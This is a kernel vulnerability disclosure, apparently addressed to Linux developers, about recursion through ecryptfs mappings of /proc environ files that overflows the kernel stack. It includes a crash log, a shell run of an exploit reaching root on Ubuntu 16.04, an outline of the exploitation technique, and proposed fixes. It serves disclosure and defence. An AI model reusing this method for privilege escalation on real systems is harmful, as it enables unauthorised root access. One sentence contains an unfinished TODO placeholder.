Stacking filesystems, including ecryptfs, protect themselves against
deep nesting, which would lead to kernel stack overflow, by tracking
the recursion depth of filesystems. E.g. in ecryptfs, this is
implemented in ecryptfs_mount() as follows:
s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
rc = -EINVAL;
if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
goto out_free;
}
The files /proc/$pid/{mem,environ,cmdline}, when read, access the
userspace memory of the target process, involving, if necessary,
normal pagefault handling. If it was possible to mmap() them, an
attacker could create a chain of e.g. /proc/$pid/environ mappings
where process 1 has /proc/2/environ mapped into its environment area,
process 2 has /proc/3/environ mapped into its environment area and so
on. A read from /proc/1/environ would invoke the pagefault handler for
process 1, which would invoke the pagefault handler for process 2 and
so on. This would, again, lead to kernel stack overflow.
One interesting fact about ecryptfs is that, because of the encryption
involved, it doesn't just forward mmap to the lower file's mmap
operation. Instead, it has its own page cache, maintained using the
normal filemap helpers, and performs its cryptographic operations when
dirty pages need to be written out or when pages need to be faulted
in. Therefore, not just its read and write handlers, but also its mmap
handler only uses the lower filesystem's read and write methods.
This means that using ecryptfs, you can mmap [decrypted views of]
files that normally wouldn't be mappable.
Combining these things, it is possible to trigger recursion with
arbitrary depth where:
a reading userspace memory access in process A (from userland or from
copy_from_user())
causes a pagefault in an ecryptfs mapping in process A, which
causes a read from /proc/{B}/environ, which
causes a pagefault in an ecryptfs mapping in process B, which
causes a read from /proc/{C}/environ, which
causes a pagefault in an ecryptfs mapping in process C, and so on.
On systems with the /sbin/mount.ecryptfs_private helper installed
(e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked
during installation), this bug can be triggered by an unprivileged
user. The mount helper considers /proc/$pid, where $pid is the PID of
a process owned by the user, to be a valid mount source because the
directory is "owned" by the user.
I have attached both a generic crash PoC and a build-specific exploit
that can be used to gain root privileges from a normal user account on
Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version
4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu
SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".
dmesg output of the crasher:
```
[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] PGD 1e0d067 PUD 0
[ 80.040028] Thread overran stack, or stack corrupted
[ 80.040028] Oops: 0000 [#1] SMP
[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046
[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
[ 80.040028] Stack:
[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
[ 80.040028] Call Trace:
[ 80.040028] <IRQ>
[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160
[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60
[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
[ 80.040028] <EOI>
[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d
[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] RSP <ffff88021fc03d70>
[ 80.040028] CR2: fffffffe4b9145c0
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
[ 80.040028] ---[ end trace 616e3de50958c35b ]---
[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
[ 80.040028] Shutting down cpus with NMI
[ 80.040028] Kernel Offset: disabled
[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
```
example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:
```
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
compile.sh exploit.c hello.c suidhelper.c
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
compile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
all spammers ready
recurser parent ready
spam over
fault chain set up, faulting now
writing stackframes
stackframes written
killing 2494
post-corruption code is alive!
children should be dead
coredump handler set. recurser exiting.
going to crash now
suid file detected, launching rootshell...
we have root privs now...
root@user-VirtualBox:/proc# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
```
(If the exploit crashes even with the right kernel version, try
restarting the machine. Also, ensure that no program like top/htop/...
is running that might try to read process command lines. Note that
the PoC and the exploit don't really clean up after themselves and
leave mountpoints behind that prevent them from re-running without
a reboot or manual unmounting.)
Note that Ubuntu compiled their kernel with
CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used
to be in the past to not crash the kernel while exploiting this bug,
and an overwrite of addr_limit would be useless because at the
time the thread_info is overwritten, there are multiple instances of
kernel_read() on the stack. Still, the bug is exploitable by carefully
aligning the stack so that the vital components of thread_info are
preserved, stopping with an out-of-bounds stack pointer and
overwriting the thread stack using a normal write to an adjacent
allocation of the buddy allocator.
Regarding the fix, I think the following would be reasonable:
- Explicitly forbid stacking anything on top of procfs by setting its
s_stack_depth to a sufficiently large value. In my opinion, there
is too much magic going on inside procfs to allow stacking things
on top of it, and there isn't any good reason to do it. (For
example, ecryptfs invokes open handlers from a kernel thread
instead of normal user process context, so the access checks inside
VFS open handlers are probably ineffective - and procfs relies
heavily on those.)
- Forbid opening files with f_op->mmap==NULL through ecryptfs. If the
lower filesystem doesn't expect to be called in pagefault-handling
context, it probably shouldn't be called in that context.
- Create a dedicated kernel stack cache outside of the direct mapping
of physical memory that has a guard page (or a multi-page gap) at
the bottom of each stack, and move the struct thread_info to a
different place (if nothing else works, the top of the stack, above
the pt_regs).
While e.g. race conditions are more common than stack overflows in
the Linux kernel, the whole vulnerability class of stack overflows
is easy to mitigate, and the kernel is sufficiently complicated for
unbounded recursion to emerge in unexpected places - or perhaps
even for someone to discover a way to create a stack with a bounded
length that is still too high. Therefore, I believe that guard
pages are a useful mitigation.
Nearly everywhere, stack overflows are caught using guard pages
nowadays; this includes Linux userland, but also {### TODO ###}
and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).
Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`
in schedule_debug() ought to be a direct panic instead of an oops. At
the moment, when you hit it, you get a recursion between the scheduler
invocation in do_exit() and the BUG_ON in the scheduler, and the
kernel recurses down the stack until it hits something sufficiently
important to cause a panic.
I'm going to send (compile-tested) patches for my first two fix
suggestions and the recursive oops bug. I haven't written a patch for
the guard pages mitigation - I'm not familiar enough with the x86
subsystem for that.
Notes regarding the exploit:
It makes an invalid assumption that causes it to require at least around 6GB of RAM.
It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.
The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.